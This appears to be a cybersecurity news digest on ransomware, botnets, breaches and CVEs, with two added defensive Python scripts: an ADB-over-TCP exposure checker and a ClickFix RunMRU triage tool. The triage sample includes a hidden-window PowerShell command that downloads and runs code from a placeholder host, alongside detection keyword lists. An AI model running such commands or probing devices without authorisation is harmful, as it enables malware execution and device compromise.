FBI Seizes RAMP Cybercrime Forum Used by Ransomware Gangs
The FBI has seized the notorious RAMP dark web forum in coordination with the DOJ. The forum had more than 14,000 users and facilitated hundreds of millions of dollars in ransomware damages. Its leaked database may expose a LockBit operator.
Google Disrupts IPIDEA, One of the World's Largest Residential Proxy Networks
Google Threat Intelligence has dismantled IPIDEA, a Chinese-operated proxy network spanning 9 million Android devices and 13 proxy brands, used by more than 550 threat groups, including state-sponsored actors from China, Russia, Iran, and North Korea.
Match Group Breach Exposes Data from Tinder, Hinge, and OkCupid
ShinyHunters stole 10 million records from Match Group's dating platforms through a vishing attack that compromised Okta SSO credentials. The breach exposed users' advertising IDs, IP addresses, and dating profile content.
SolarWinds Patches Critical RCE and Auth Bypass Flaws in Web Help Desk
Four critical vulnerabilities in SolarWinds Web Help Desk allow unauthenticated remote code execution and authentication bypass. CISA has confirmed active exploitation and set a February 6 patching deadline for federal agencies.
Aisuru Botnet Hits 31.4 Tbps in Record-Setting DDoS Attack on Telecom Providers
The Aisuru/Kimwolf botnet launched the largest DDoS attack on record at 31.4 Tbps, powered by 2 million compromised Android TV boxes. The boxes were infected through exposed ADB ports that the attackers reached via residential proxy networks.
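The infection vector in this item is ADB exposed over TCP. The following is an added example, not code from this page or from any vendor report: it builds the ADB CONNECT probe and classifies a device's first reply as "open" (CNXN, no key check, so anyone who reaches the port gets a shell) or "auth-required" (AUTH, a signed nonce is needed), which is the check to run on your own network for boxes that a botnet like this could recruit. The protocol constants follow the public ADB wire format; the two sample replies and the product properties in them are constructed, and probe_host is a hypothetical helper for live use against devices you are authorised to test.

```python
"""Classify an ADB-over-TCP service (default port 5555) from its first reply.

Added example for the Aisuru/Kimwolf item above; it is not code from any
vendor report. Message layout follows the public ADB wire protocol: a 24-byte
little-endian header (command, arg0, arg1, data_length, data_check,
magic = command ^ 0xFFFFFFFF) followed by the payload. The two sample replies
are constructed here, not captured from a real device.
"""
import socket
import struct

A_CNXN = 0x4E584E43        # b"CNXN" read as a little-endian uint32
A_AUTH = 0x48545541        # b"AUTH"
A_VERSION = 0x01000000     # classic version; 0x01000001 and later may send data_check = 0
MAX_PAYLOAD = 4096
ADB_AUTH_TOKEN = 1         # AUTH arg0 when the device asks the client to sign a nonce

HEADER = struct.Struct("<IIIIII")


def build_message(command, arg0, arg1, payload=b""):
    """Serialise one ADB message; data_check is the byte sum of the payload."""
    return HEADER.pack(command, arg0, arg1, len(payload),
                       sum(payload) & 0xFFFFFFFF, command ^ 0xFFFFFFFF) + payload


def build_probe():
    """The CONNECT message an adb client sends first. adbd answers with
    CNXN (no key check: anyone gets a shell) or AUTH (a signed nonce is required)."""
    return build_message(A_CNXN, A_VERSION, MAX_PAYLOAD, b"host::\x00")


def parse_message(raw):
    """Validate header, magic, length and checksum; return (command, arg0, arg1, payload)."""
    if len(raw) < HEADER.size:
        raise ValueError("short header")
    command, arg0, arg1, length, check, magic = HEADER.unpack_from(raw)
    if magic != command ^ 0xFFFFFFFF:
        raise ValueError("bad magic: not an ADB message")
    payload = raw[HEADER.size:HEADER.size + length]
    if len(payload) != length:
        raise ValueError("truncated payload")
    # Newer adbd builds skip the checksum and send 0, so accept either form.
    if check not in (0, sum(payload) & 0xFFFFFFFF):
        raise ValueError("bad checksum")
    return command, arg0, arg1, payload


def classify_response(raw):
    """Map the device's first reply to a risk status."""
    command, arg0, _arg1, payload = parse_message(raw)
    if command == A_CNXN:
        # Unauthenticated: the identity string is "device::key=value;key=value;..."
        banner = payload.rstrip(b"\x00").decode("utf-8", errors="replace")
        parts = banner.split("::", 1)
        props_text = parts[1] if len(parts) > 1 else ""
        props = dict(kv.split("=", 1) for kv in props_text.split(";") if "=" in kv)
        return {"status": "open", "banner": banner, "props": props}
    if command == A_AUTH:
        # Reachable but key-gated: still a finding, ADB should not face the network at all.
        return {"status": "auth-required", "auth_type": arg0, "token_len": len(payload)}
    return {"status": "unknown", "command": command}


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed before a full ADB message arrived")
        buf += chunk
    return buf


def probe_host(host, port=5555, timeout=3.0):
    """Hypothetical live check for a device you are authorised to test; not run offline."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_probe())
        head = _recv_exact(s, HEADER.size)
        length = HEADER.unpack_from(head)[3]          # data_length field
        return classify_response(head + _recv_exact(s, length))


# Constructed replies standing in for two kinds of TV box (not real captures).
SAMPLE_OPEN = build_message(
    A_CNXN, A_VERSION, MAX_PAYLOAD,
    b"device::ro.product.name=example_tvbox;ro.product.model=TVBOX-1;ro.product.device=tvbox;\x00")
SAMPLE_AUTH = build_message(A_AUTH, ADB_AUTH_TOKEN, 0, bytes(range(20)))

if __name__ == "__main__":
    for name, reply in (("open box", SAMPLE_OPEN), ("key-gated box", SAMPLE_AUTH)):
        print(name, classify_response(reply))
```

Only point probe_host at devices you own or have permission to test. An "auth-required" result still means ADB is listening on the network; the fix on a TV box is to turn off ADB over TCP (or USB debugging entirely) rather than to rely on the key prompt, since a box that has ever authorised an attacker's key stays open to it.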
Ransomware Attacks Surge 45% in 2025 with Over 9,200 Cases Recorded
NordStellar research counts 9,251 ransomware incidents in 2025, with Qilin leading at 1,066 attacks, a 408% increase. December set a two-year monthly record with 1,004 incidents, and the report projects more than 12,000 attacks in 2026.
Google's $32 Billion Wiz Acquisition Nears Completion Pending EU Decision
Alphabet's record-breaking acquisition of cloud security startup Wiz awaits final EU regulatory clearance expected February 10, 2026. The deal will reshape the cloud security market and integrate Wiz's CNAPP platform into Google Cloud.
China-Linked UAT-8099 Deploys BadIIS Malware for SEO Fraud Across Asia
Cisco Talos identified Chinese-speaking threat actor UAT-8099 compromising IIS servers in Asia with BadIIS malware variants, hijacking legitimate websites for SEO poisoning and credential theft.
xz Utils Backdoor: The Most Sophisticated Supply Chain Attack Since SolarWinds
In March 2024, a Microsoft engineer discovered by chance a backdoor in xz Utils, planted by an attacker who had spent nearly three years building trust in the open-source community. It was caught before it reached most production systems; had it not been, the backdoor could have compromised millions of Linux servers.
ClickFix Attacks Combine Fake CAPTCHAs with Signed Microsoft Scripts to Deploy Stealer
The EVALUSION campaign uses social engineering, Google Calendar for C2, and steganography to distribute the Amatera information stealer. ClickFix, the technique the campaign is built on, now appears in 47% of observed attacks.
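The ClickFix step that matters for responders is the command the victim pastes into the Win+R Run dialog, which Windows records under the RunMRU registry key. Below is an added example, not code from the campaign report: it parses a .reg export of that key, restores most-recent-first order from MRUList, and flags entries that launch an interpreter together with download, hidden-window or CAPTCHA-lure indicators. The sample export, its example.invalid URL and the indicator lists are constructed assumptions; they will not match every variant, including the signed-script one in the headline, so treat a hit as a triage lead rather than proof.

```python
"""Triage the Windows Run-dialog history (RunMRU) for ClickFix-style pasted commands.

Added example for the ClickFix item above; it is not code from the campaign
write-up. ClickFix lures tell the victim to press Win+R and paste a command,
and Explorer records each Run-dialog entry under
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU as values
"a", "b", ... (each ending in "\\1"), with the MRUList value giving the
most-recent-first order. The .reg text below is constructed; on a real host
export the key with
    reg export "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU" runmru.reg
and open the file with encoding="utf-16" (reg.exe writes UTF-16 with a BOM).
"""
import re

_INTERPRETER = re.compile(
    r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|curl|certutil|msiexec|rundll32|bitsadmin)(\.exe)?\b")
_DOWNLOAD_OR_HIDE = ("http", "irm ", "iwr ", "iex", "downloadstring", "frombase64string",
                     "-enc", "-w hidden", "-windowstyle hidden", "-nop")
_LURE = ("not a robot", "captcha", "verification", "verify you are human")
_REG_VALUE = re.compile(r'^"([^"]+)"="(.*)"$')


def parse_runmru(reg_text):
    """Return Run-dialog commands, most recent first, from a .reg export of RunMRU."""
    values = {}
    for line in reg_text.splitlines():
        m = _REG_VALUE.match(line.strip())
        if m:
            name, raw = m.groups()
            values[name] = re.sub(r"\\(.)", r"\1", raw)   # undo .reg escaping of \ and "
    order = values.pop("MRUList", "")
    commands = []
    for slot in order:
        cmd = values.get(slot)
        if cmd is None:
            continue
        if cmd.endswith("\\1"):            # Explorer appends "\1" to every RunMRU entry
            cmd = cmd[:-2]
        commands.append(cmd)
    return commands


def triage(cmd):
    """Reasons a single Run-dialog command looks like a ClickFix paste."""
    low = cmd.lower()
    reasons = []
    if _INTERPRETER.search(low):
        reasons.append("interpreter")
    if any(tok in low for tok in _DOWNLOAD_OR_HIDE):
        reasons.append("download/hidden-window")
    if any(w in low for w in _LURE):
        reasons.append("captcha-lure text")
    return reasons


def find_clickfix(reg_text):
    """Flag entries that launch an interpreter and show at least one more indicator."""
    hits = []
    for recency, cmd in enumerate(parse_runmru(reg_text)):
        reasons = triage(cmd)
        if "interpreter" in reasons and len(reasons) > 1:
            hits.append({"recency": recency, "command": cmd, "reasons": reasons})
    return hits


# Constructed export (not from a real host): "MRUList"="cab" means slot c is newest.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"MRUList"="cab"
"a"="notepad\\1"
"b"="calc\\1"
"c"="powershell -w hidden -c \"iex (irm https://example.invalid/x)\" # I am not a robot - reCAPTCHA Verification ID: 7624\\1"
'''

if __name__ == "__main__":
    for hit in find_clickfix(SAMPLE_REG):
        print(hit)
```

RunMRU only records what went through the Run dialog; a lure that tells the victim to paste into a PowerShell or terminal window instead leaves its trace in process-creation logs and PowerShell history, so pair this with those sources rather than relying on it alone.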
Fortinet Patches FortiCloud SSO Authentication Bypass Under Active Exploitation
CVE-2026-24858 allows attackers with any FortiCloud account to authenticate to other customers' devices. Arctic Wolf observed automated exploitation creating backdoor admin accounts within seconds.
Critical 'Cellbreak' Vulnerability in Grist Spreadsheet Platform Enables RCE
CVE-2026-24002 allows remote code execution: a malicious spreadsheet formula escapes the Pyodide sandbox in which Grist evaluates formulas. The flaw affects government, education, and enterprise deployments.